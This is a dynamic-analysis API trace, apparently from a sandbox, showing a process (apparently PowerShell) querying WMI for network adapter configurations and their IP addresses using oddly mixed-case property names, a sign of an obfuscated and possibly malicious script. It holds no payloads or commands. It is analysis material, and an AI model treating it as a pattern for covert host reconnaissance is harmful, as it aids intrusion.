	[0127.540] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__DERIVATION", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad3bb04490*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ad3bac2c90, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0xd7ef71c85c*=8200, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.540] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__SERVER", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="X2VS1CUM", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.540] SysStringLen (param_1="X2VS1CUM") returned 0x8
	[0127.540] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__NAMESPACE", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.540] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0127.540] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__PATH", lFlags=0, pVal=0xd7ef71c860*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c85c*=0, plFlavor=0xd7ef71c858*=0 | out: pVal=0xd7ef71c860*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1", varVal2=0x0), pType=0xd7ef71c85c*=8, plFlavor=0xd7ef71c858*=64) returned 0x0
	[0127.540] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1") returned 0x3f
	[0127.540] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71c900 | out: puCount=0xd7ef71c900*=0x2) returned 0x0
	[0127.540] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c900*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71c900*=0x17, pszText=0x0) returned 0x0
	[0127.540] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c900*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71c900*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.540] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="IPAddREss", lFlags=0, pVal=0xd7ef71c8f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c8ec*=0, plFlavor=0xd7ef71c8e8*=0 | out: pVal=0xd7ef71c8f0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad3bb04210*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ad3bb1ed40, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0xd7ef71c8ec*=8200, plFlavor=0xd7ef71c8e8*=0) returned 0x0
	[0127.540] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="IPAddREss", lFlags=0, pVal=0xd7ef71cb20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71cb1c*=8200, plFlavor=0xd7ef71cb18*=0 | out: pVal=0xd7ef71cb20*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad3bb04610*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ad3bb1ee60, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0xd7ef71cb1c*=8200, plFlavor=0xd7ef71cb18*=0) returned 0x0
	[0127.541] CoTaskMemAlloc (cb=0x104) returned 0x2ad3bb22370
	[0127.541] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad3bb22370, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0127.541] CoTaskMemFree (pv=0x2ad3bb22370) 
	[0127.553] CoTaskMemAlloc (cb=0x104) returned 0x2ad3bb226a0
	[0127.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad3bb226a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0127.553] CoTaskMemFree (pv=0x2ad3bb226a0) 
	[0127.553] IWbemClassObject:GetNames (in: This=0x2ad206a72f0, wszQualifierName=0x0, lFlags=48, pQualifierVal=0xd7ef71c818*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0xd7ef71c810 | out: pNames=0xd7ef71c810*="\x01ƀ\x08") returned 0x0
	[0127.553] SafeArrayGetDim (psa=0x2ad3bb04150) returned 0x1
	[0127.554] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__GENUS", lFlags=0, pVal=0xd7ef71c810*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c80c*=0, plFlavor=0xd7ef71c808*=0 | out: pVal=0xd7ef71c810*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0xd7ef71c80c*=3, plFlavor=0xd7ef71c808*=64) returned 0x0
	[0127.554] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__CLASS", lFlags=0, pVal=0xd7ef71c810*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c80c*=0, plFlavor=0xd7ef71c808*=0 | out: pVal=0xd7ef71c810*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0xd7ef71c80c*=8, plFlavor=0xd7ef71c808*=64) returned 0x0
	[0127.554] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0127.554] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__SUPERCLASS", lFlags=0, pVal=0xd7ef71c810*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c80c*=0, plFlavor=0xd7ef71c808*=0 | out: pVal=0xd7ef71c810*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0xd7ef71c80c*=8, plFlavor=0xd7ef71c808*=64) returned 0x0
	[0127.554] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0127.554] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__DYNASTY", lFlags=0, pVal=0xd7ef71c810*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c80c*=0, plFlavor=0xd7ef71c808*=0 | out: pVal=0xd7ef71c810*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0xd7ef71c80c*=8, plFlavor=0xd7ef71c808*=64) returned 0x0
	[0127.554] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0127.554] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__RELPATH", lFlags=0, pVal=0xd7ef71c810*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c80c*=0, plFlavor=0xd7ef71c808*=0 | out: pVal=0xd7ef71c810*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration.Index=1", varVal2=0x0), pType=0xd7ef71c80c*=8, plFlavor=0xd7ef71c808*=64) returned 0x0
	[0127.554] SysStringLen (param_1="Win32_NetworkAdapterConfiguration.Index=1") returned 0x29
	[0127.554] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0xd7ef71c810*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c80c*=0, plFlavor=0xd7ef71c808*=0 | out: pVal=0xd7ef71c810*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d, varVal2=0x0), pType=0xd7ef71c80c*=3, plFlavor=0xd7ef71c808*=64) returned 0x0
	[0127.554] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__DERIVATION", lFlags=0, pVal=0xd7ef71c810*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c80c*=0, plFlavor=0xd7ef71c808*=0 | out: pVal=0xd7ef71c810*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad3bb04210*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ad3bac2b80, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0xd7ef71c80c*=8200, plFlavor=0xd7ef71c808*=64) returned 0x0
	[0127.554] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__SERVER", lFlags=0, pVal=0xd7ef71c810*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c80c*=0, plFlavor=0xd7ef71c808*=0 | out: pVal=0xd7ef71c810*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="X2VS1CUM", varVal2=0x0), pType=0xd7ef71c80c*=8, plFlavor=0xd7ef71c808*=64) returned 0x0
	[0127.554] SysStringLen (param_1="X2VS1CUM") returned 0x8
	[0127.555] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__NAMESPACE", lFlags=0, pVal=0xd7ef71c810*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c80c*=0, plFlavor=0xd7ef71c808*=0 | out: pVal=0xd7ef71c810*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0xd7ef71c80c*=8, plFlavor=0xd7ef71c808*=64) returned 0x0
	[0127.555] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0127.555] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__PATH", lFlags=0, pVal=0xd7ef71c810*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c80c*=0, plFlavor=0xd7ef71c808*=0 | out: pVal=0xd7ef71c810*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1", varVal2=0x0), pType=0xd7ef71c80c*=8, plFlavor=0xd7ef71c808*=64) returned 0x0
	[0127.555] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1") returned 0x3f
	[0127.555] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71c8b0 | out: puCount=0xd7ef71c8b0*=0x2) returned 0x0
	[0127.555] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c8b0*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71c8b0*=0x17, pszText=0x0) returned 0x0
	[0127.555] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c8b0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71c8b0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.555] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="IPADdreSs", lFlags=0, pVal=0xd7ef71c8a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c89c*=0, plFlavor=0xd7ef71c898*=0 | out: pVal=0xd7ef71c8a0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad3bb04410*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ad3bb1eb40, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0xd7ef71c89c*=8200, plFlavor=0xd7ef71c898*=0) returned 0x0
	[0127.555] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71c830 | out: puCount=0xd7ef71c830*=0x2) returned 0x0
	[0127.556] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c830*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71c830*=0x17, pszText=0x0) returned 0x0
	[0127.556] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c830*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71c830*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.556] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71c830 | out: puCount=0xd7ef71c830*=0x2) returned 0x0
	[0127.556] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c830*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71c830*=0x17, pszText=0x0) returned 0x0
	[0127.556] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c830*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71c830*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.556] IWbemClassObject:GetNames (in: This=0x2ad206a72f0, wszQualifierName=0x0, lFlags=48, pQualifierVal=0xd7ef71c828*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0xd7ef71c820 | out: pNames=0xd7ef71c820*="\x01ƀ\x08") returned 0x0
	[0127.556] SafeArrayGetDim (psa=0x2ad3bb041d0) returned 0x1
	[0127.556] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__GENUS", lFlags=0, pVal=0xd7ef71c820*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c81c*=0, plFlavor=0xd7ef71c818*=0 | out: pVal=0xd7ef71c820*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0xd7ef71c81c*=3, plFlavor=0xd7ef71c818*=64) returned 0x0
	[0127.556] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__CLASS", lFlags=0, pVal=0xd7ef71c820*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c81c*=0, plFlavor=0xd7ef71c818*=0 | out: pVal=0xd7ef71c820*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration", varVal2=0x0), pType=0xd7ef71c81c*=8, plFlavor=0xd7ef71c818*=64) returned 0x0
	[0127.556] SysStringLen (param_1="Win32_NetworkAdapterConfiguration") returned 0x21
	[0127.556] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__SUPERCLASS", lFlags=0, pVal=0xd7ef71c820*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c81c*=0, plFlavor=0xd7ef71c818*=0 | out: pVal=0xd7ef71c820*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0xd7ef71c81c*=8, plFlavor=0xd7ef71c818*=64) returned 0x0
	[0127.556] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0127.556] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__DYNASTY", lFlags=0, pVal=0xd7ef71c820*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c81c*=0, plFlavor=0xd7ef71c818*=0 | out: pVal=0xd7ef71c820*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_Setting", varVal2=0x0), pType=0xd7ef71c81c*=8, plFlavor=0xd7ef71c818*=64) returned 0x0
	[0127.556] SysStringLen (param_1="CIM_Setting") returned 0xb
	[0127.556] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__RELPATH", lFlags=0, pVal=0xd7ef71c820*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c81c*=0, plFlavor=0xd7ef71c818*=0 | out: pVal=0xd7ef71c820*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_NetworkAdapterConfiguration.Index=1", varVal2=0x0), pType=0xd7ef71c81c*=8, plFlavor=0xd7ef71c818*=64) returned 0x0
	[0127.556] SysStringLen (param_1="Win32_NetworkAdapterConfiguration.Index=1") returned 0x29
	[0127.556] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0xd7ef71c820*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c81c*=0, plFlavor=0xd7ef71c818*=0 | out: pVal=0xd7ef71c820*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3d, varVal2=0x0), pType=0xd7ef71c81c*=3, plFlavor=0xd7ef71c818*=64) returned 0x0
	[0127.556] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__DERIVATION", lFlags=0, pVal=0xd7ef71c820*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c81c*=0, plFlavor=0xd7ef71c818*=0 | out: pVal=0xd7ef71c820*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad3bb04150*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ad3bac2d50, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0xd7ef71c81c*=8200, plFlavor=0xd7ef71c818*=64) returned 0x0
	[0127.557] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__SERVER", lFlags=0, pVal=0xd7ef71c820*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c81c*=0, plFlavor=0xd7ef71c818*=0 | out: pVal=0xd7ef71c820*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="X2VS1CUM", varVal2=0x0), pType=0xd7ef71c81c*=8, plFlavor=0xd7ef71c818*=64) returned 0x0
	[0127.557] SysStringLen (param_1="X2VS1CUM") returned 0x8
	[0127.557] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__NAMESPACE", lFlags=0, pVal=0xd7ef71c820*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c81c*=0, plFlavor=0xd7ef71c818*=0 | out: pVal=0xd7ef71c820*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0xd7ef71c81c*=8, plFlavor=0xd7ef71c818*=64) returned 0x0
	[0127.557] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0127.557] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="__PATH", lFlags=0, pVal=0xd7ef71c820*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c81c*=0, plFlavor=0xd7ef71c818*=0 | out: pVal=0xd7ef71c820*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1", varVal2=0x0), pType=0xd7ef71c81c*=8, plFlavor=0xd7ef71c818*=64) returned 0x0
	[0127.557] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=1") returned 0x3f
	[0127.557] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb12980, puCount=0xd7ef71c8c0 | out: puCount=0xd7ef71c8c0*=0x2) returned 0x0
	[0127.557] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c8c0*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71c8c0*=0x17, pszText=0x0) returned 0x0
	[0127.557] IWbemPath:GetText (in: This=0x2ad3bb12980, lFlags=4, puBuffLength=0xd7ef71c8c0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71c8c0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.557] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="IPADdreSs", lFlags=0, pVal=0xd7ef71c8b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71c8ac*=0, plFlavor=0xd7ef71c8a8*=0 | out: pVal=0xd7ef71c8b0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad3bb04150*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ad3bb1ed40, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0xd7ef71c8ac*=8200, plFlavor=0xd7ef71c8a8*=0) returned 0x0
	[0127.557] IWbemClassObject:Get (in: This=0x2ad206a72f0, wszName="IPADdreSs", lFlags=0, pVal=0xd7ef71ca70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71ca6c*=8200, plFlavor=0xd7ef71ca68*=0 | out: pVal=0xd7ef71ca70*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad3bb04150*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ad3bb1eca0, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0xd7ef71ca6c*=8200, plFlavor=0xd7ef71ca68*=0) returned 0x0
	[0127.558] CoTaskMemAlloc (cb=0x8) returned 0x2ad3bac2e40
	[0127.558] IEnumWbemClassObject:Next (in: This=0x2ad3bae1500, lTimeout=-1, uCount=0x1, apObjects=0x2ad3bac2e40, puReturned=0xd7ef71d3f8 | out: apObjects=0x2ad3bac2e40*=0x2ad206a52b0, puReturned=0xd7ef71d3f8*=0x1) returned 0x0
	[0127.558] IUnknown:QueryInterface (in: This=0x2ad206a52b0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c720 | out: ppvObject=0xd7ef71c720*=0x2ad206a52b0) returned 0x0
	[0127.558] IUnknown:QueryInterface (in: This=0x2ad206a52b0, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xd7ef71c7a0 | out: ppvObject=0xd7ef71c7a0*=0x0) returned 0x80004002
	[0127.559] IUnknown:QueryInterface (in: This=0x2ad206a52b0, riid=0x7ffbf57cd2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xd7ef71c538 | out: ppvObject=0xd7ef71c538*=0x0) returned 0x80004002
	[0127.559] IUnknown:AddRef (This=0x2ad206a52b0) returned 0x3
	[0127.559] CoGetContextToken (in: pToken=0xd7ef71c3f0 | out: pToken=0xd7ef71c3f0) returned 0x0
	[0127.559] IUnknown:QueryInterface (in: This=0x2ad206a52b0, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c3b0 | out: ppvObject=0xd7ef71c3b0*=0x2ad206a52b8) returned 0x0
	[0127.559] IMarshal:GetUnmarshalClass (in: This=0x2ad206a52b8, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xd7ef71c3e0 | out: pCid=0xd7ef71c3e0) returned 0x0
	[0127.559] IUnknown:Release (This=0x2ad206a52b8) returned 0x3
	[0127.559] CoGetContextToken (in: pToken=0xd7ef71c3c0 | out: pToken=0xd7ef71c3c0) returned 0x0
	[0127.559] IUnknown:AddRef (This=0x2ad206a52b0) returned 0x4
	[0127.559] IUnknown:QueryInterface (in: This=0x2ad206a52b0, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c4d8 | out: ppvObject=0xd7ef71c4d8*=0x0) returned 0x80004002
	[0127.559] IUnknown:Release (This=0x2ad206a52b0) returned 0x3
	[0127.559] IUnknown:Release (This=0x2ad206a52b0) returned 0x2
	[0127.559] CoGetContextToken (in: pToken=0xd7ef71c880 | out: pToken=0xd7ef71c880) returned 0x0
	[0127.559] CoGetContextToken (in: pToken=0xd7ef71c7c0 | out: pToken=0xd7ef71c7c0) returned 0x0
	[0127.559] IUnknown:AddRef (This=0x2ad206a52b0) returned 0x3
	[0127.559] IUnknown:QueryInterface (in: This=0x2ad206a52b0, riid=0xd7ef71c900*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xd7ef71c8e0 | out: ppvObject=0xd7ef71c8e0*=0x2ad206a52b0) returned 0x0
	[0127.560] IUnknown:Release (This=0x2ad206a52b0) returned 0x3
	[0127.560] IUnknown:Release (This=0x2ad206a52b0) returned 0x2
	[0127.560] IUnknown:Release (This=0x2ad206a52b0) returned 0x1
	[0127.560] CoTaskMemFree (pv=0x2ad3bac2e40) 
	[0127.560] CoGetContextToken (in: pToken=0xd7ef71d200 | out: pToken=0xd7ef71d200) returned 0x0
	[0127.560] IUnknown:AddRef (This=0x2ad206a52b0) returned 0x2
	[0127.560] IWbemClassObject:Get (in: This=0x2ad206a52b0, wszName="__GENUS", lFlags=0, pVal=0xd7ef71d370*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d36c*=0, plFlavor=0xd7ef71d368*=0 | out: pVal=0xd7ef71d370*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0xd7ef71d36c*=3, plFlavor=0xd7ef71d368*=64) returned 0x0
	[0127.560] IWbemClassObject:Get (in: This=0x2ad206a52b0, wszName="__PATH", lFlags=0, pVal=0xd7ef71d310*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d30c*=0, plFlavor=0xd7ef71d308*=0 | out: pVal=0xd7ef71d310*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=2", varVal2=0x0), pType=0xd7ef71d30c*=8, plFlavor=0xd7ef71d308*=64) returned 0x0
	[0127.560] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_NetworkAdapterConfiguration.Index=2") returned 0x3f
